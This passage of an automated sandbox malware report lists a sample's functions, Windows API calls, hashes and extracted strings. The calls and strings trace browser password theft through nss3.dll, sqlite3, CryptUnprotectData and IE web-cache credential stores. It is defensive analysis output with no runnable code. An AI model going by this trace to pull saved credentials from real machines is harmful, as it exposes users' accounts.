                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00409A41,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat,?,?,?,00409F26,?,0040A0FE,000000FF,00000000,00000104), ref: 004057AD
                                                                                                                                                                          • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2136311172-0
                                                                                                                                                                        • Opcode ID: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                        • Instruction ID: 00704370d8ec878584a64fe5f9f18aab24b7d249e6cd1ef38c395e5c556ec921
                                                                                                                                                                        • Opcode Fuzzy Hash: 81d98ab7555efe12e5c8b48e24a2d6677c0216f0edfc1775a14d27b6400d9af5
                                                                                                                                                                        • Instruction Fuzzy Hash: 190181B5415A00DFE7205B30C905BA776E8EF51315F10893FE595E72C1EB7C9480DAAE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00409539 Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
                                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                                                        • Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                        • Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
                                                                                                                                                                        • Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
                                                                                                                                                                        • Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B1BF Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                        • Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
                                                                                                                                                                        • Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
                                                                                                                                                                        • Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408F1E Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                        • Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
                                                                                                                                                                        • Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
                                                                                                                                                                        • Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00414C5E Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: free
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                        • Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                        • Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
                                                                                                                                                                        • Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
                                                                                                                                                                        • Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        Function 00443A61 Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00443A8C
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443AA3
                                                                                                                                                                        • memset.MSVCRT ref: 00443AD6
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443AEC
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443AFD
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443B23
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443B34
                                                                                                                                                                        • wcscpy.MSVCRT ref: 00443B5B
                                                                                                                                                                        • wcscat.MSVCRT ref: 00443B6C
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
                                                                                                                                                                        • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
                                                                                                                                                                        • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
                                                                                                                                                                        • LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                                                                                                                                        • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                                                                                                        • API String ID: 2522319644-522817110
                                                                                                                                                                        • Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                        • Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
                                                                                                                                                                        • Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00418137 Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4218492932-0
                                                                                                                                                                        • Opcode ID: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                        • Instruction ID: d236c1b17a1aae76216467299f6e18822a0d202c31a727bef5ceca0d2f67f94c
                                                                                                                                                                        • Opcode Fuzzy Hash: fda9e58c4000ceba745e64ac9364c45ec6b3e521a2b8c8870e442f0a76aa31b3
                                                                                                                                                                        • Instruction Fuzzy Hash: B31184B3D005186BDB00EFA4DC49EDAB7ACEB5A210F454937FA15DB141E638E6448798
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00417BE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00417BF2
                                                                                                                                                                          • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C19
                                                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C42
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00417C5D
                                                                                                                                                                        • free.MSVCRT(?,0044C838,?), ref: 00417C8B
                                                                                                                                                                          • Part of subcall function 00416D4F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,73B75970,?,00416E7A,?), ref: 00416D6D
                                                                                                                                                                          • Part of subcall function 00416D4F: malloc.MSVCRT ref: 00416D74
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                        • String ID: OsError 0x%x (%u)
                                                                                                                                                                        • API String ID: 2360000266-2664311388
                                                                                                                                                                        • Opcode ID: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                        • Instruction ID: 86e7f975cda22aef79341c94f36a987d619a37d11feed098ff88b3a8796ba2f5
                                                                                                                                                                        • Opcode Fuzzy Hash: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
                                                                                                                                                                        • Instruction Fuzzy Hash: BA11B234E01228BBDB11ABA2DD8DCDF7F78EF85750B20005BF40592211E7784A80DBE8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00408CAC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00408CC4
                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408CE3
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00408D03
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                                                                                        • String ID: .$1k@$nss3.dll
                                                                                                                                                                        • API String ID: 3541575487-3908353483
                                                                                                                                                                        • Opcode ID: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                        • Instruction ID: f3d79de5d6fec64b9baa04ebfd9a669330ca9081903d010b6bc69252f5057639
                                                                                                                                                                        • Opcode Fuzzy Hash: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
                                                                                                                                                                        • Instruction Fuzzy Hash: 6CF0BB759005246BDF205B64EC4C6ABB7BCFF45365F000176ED06A71C1D7749D458A98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F078 Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
                                                                                                                                                                          • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
                                                                                                                                                                          • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
                                                                                                                                                                        • OpenClipboard.USER32(?), ref: 0040F0B6
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0040F0CB
                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 0040F0EA
                                                                                                                                                                          • Part of subcall function 00407F9A: EmptyClipboard.USER32 ref: 00407FA4
                                                                                                                                                                          • Part of subcall function 00407F9A: GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
                                                                                                                                                                          • Part of subcall function 00407F9A: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
                                                                                                                                                                          • Part of subcall function 00407F9A: GlobalLock.KERNEL32 ref: 00407FDF
                                                                                                                                                                          • Part of subcall function 00407F9A: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
                                                                                                                                                                          • Part of subcall function 00407F9A: GlobalUnlock.KERNEL32(00000000), ref: 00408004
                                                                                                                                                                          • Part of subcall function 00407F9A: SetClipboardData.USER32(0000000D,00000000), ref: 0040800D
                                                                                                                                                                          • Part of subcall function 00407F9A: CloseHandle.KERNEL32(?), ref: 00408021
                                                                                                                                                                          • Part of subcall function 00407F9A: CloseClipboard.USER32 ref: 00408035
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2633007058-0
                                                                                                                                                                        • Opcode ID: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
                                                                                                                                                                        • Instruction ID: d4411bd4de1fade650879fa69a29e8aba7a0aa0f0e0d1894cd1391532f6ebd18
                                                                                                                                                                        • Opcode Fuzzy Hash: dbdd240ec4c17506c233b057a251f0f9826ab019b5c58cf36240f842d410ce54
                                                                                                                                                                        • Instruction Fuzzy Hash: 4CF0A4357003006BEA3027359C0EF9B375DDB80714F00453AF852A65D3EE79E8898568
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004083A1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetVersionExW.KERNEL32(00452E28,0000001A,00414579), ref: 004083BB
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Version
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1889659487-0
                                                                                                                                                                        • Opcode ID: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
                                                                                                                                                                        • Instruction ID: e5ecc73df534455334d47becca92420b288d3786a246e23e5c2a841cda36e69b
                                                                                                                                                                        • Opcode Fuzzy Hash: f32d612d38ed498016a89dab6c267832ac7a7cfec2e4bb44aaae2ab0a1dc17ad
                                                                                                                                                                        • Instruction Fuzzy Hash: 17C08C329112208BDB11AB08FE0A7CD72989B0B727F014077E802A2252C7F848048BBC
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00402316 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 282COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040233E
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040236E
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 0040239B
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 004023C8
                                                                                                                                                                          • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
                                                                                                                                                                          • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
                                                                                                                                                                        • memset.MSVCRT ref: 0040276C
                                                                                                                                                                        • memcpy.MSVCRT ref: 004027A1
                                                                                                                                                                          • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
                                                                                                                                                                          • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
                                                                                                                                                                          • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
                                                                                                                                                                        • memcpy.MSVCRT ref: 004027FD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040285B
                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040286A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                                                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                        • API String ID: 462158748-1134094380
                                                                                                                                                                        • Opcode ID: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                        • Instruction ID: 2d0d0591d6411435ed5b4a397348faa82e1f821ad6e98c1f3977ba2ad668a768
                                                                                                                                                                        • Opcode Fuzzy Hash: 246289cc761095d3282f061c6661885811be97903d0431df7fe71b9348d70a6f
                                                                                                                                                                        • Instruction Fuzzy Hash: FBF1F2218087E9C9DB32C7788C097DEBE655B23324F0443D9D1E87A2D2D7B94B85CB66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040AA82 Relevance: 59.8, APIs: 27, Strings: 7, Instructions: 275stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                        • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                                                                                                                                        • API String ID: 2787044678-1843504584
                                                                                                                                                                        • Opcode ID: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                        • Instruction ID: f322a3b8e7f5a6d162087a7bfffa82d5495360e728e73a59fe9151b9b78652c6
                                                                                                                                                                        • Opcode Fuzzy Hash: e2457ad6ca42d193e80316c10ddae1068f24ef91d2d9060435258109d1c91a7c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8191B271500219ABEF20DF55CC45FEF776DAF91314F01046AF948A7181EA3CEDA48B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004136DC Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413709
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413715
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00413724
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00413730
                                                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 00413739
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00413745
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413757
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413762
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00413776
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 00413784
                                                                                                                                                                        • GetDC.USER32 ref: 004137BD
                                                                                                                                                                        • wcslen.MSVCRT ref: 004137FD
                                                                                                                                                                        • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0041380E
                                                                                                                                                                        • ReleaseDC.USER32 ref: 0041385B
                                                                                                                                                                        • _snwprintf.MSVCRT ref: 0041391E
                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00413932
                                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00413950
                                                                                                                                                                        • GetDlgItem.USER32 ref: 00413986
                                                                                                                                                                        • GetWindowRect.USER32 ref: 00413996
                                                                                                                                                                        • MapWindowPoints.USER32 ref: 004139A4
                                                                                                                                                                        • GetClientRect.USER32 ref: 004139BB
                                                                                                                                                                        • GetWindowRect.USER32 ref: 004139C5
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00413A0B
                                                                                                                                                                        • GetClientRect.USER32 ref: 00413A15
                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00413A4D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                        • String ID: %s:$EDIT$STATIC
                                                                                                                                                                        • API String ID: 2080319088-3046471546
                                                                                                                                                                        • Opcode ID: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                        • Instruction ID: eaed71e83b935c0691042ece96cd3f4181ba93c5b62309cd5e6c1ba419c0f7d3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f661689a16f30b4fa36713fc37c722b17d06984e66b4dec75b1866f03cb0f10
                                                                                                                                                                        • Instruction Fuzzy Hash: 8AB1CE71108701AFDB21DFA8C985A6BBBF9FB88704F004A2EF59582261DB75E904CF56
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040109F Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                        • String ID: WebBrowserPassView
                                                                                                                                                                        • API String ID: 829165378-2171583229
                                                                                                                                                                        • Opcode ID: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                        • Instruction ID: da1635bf63897f0d85a147e608c4a0468d220b7f7222c61bbc2b07ca64c81474
                                                                                                                                                                        • Opcode Fuzzy Hash: 95eecf1aeaf4173b7886c49fcd2dca83b006b5accde3bfdcc70f81c0122d4831
                                                                                                                                                                        • Instruction Fuzzy Hash: 4751BF34500B08EBDF22AF60CC45E6E7BB5FB04341F104A3AF952A65F1C7B9A950EB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040716C Relevance: 42.2, APIs: 11, Strings: 13, Instructions: 221COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
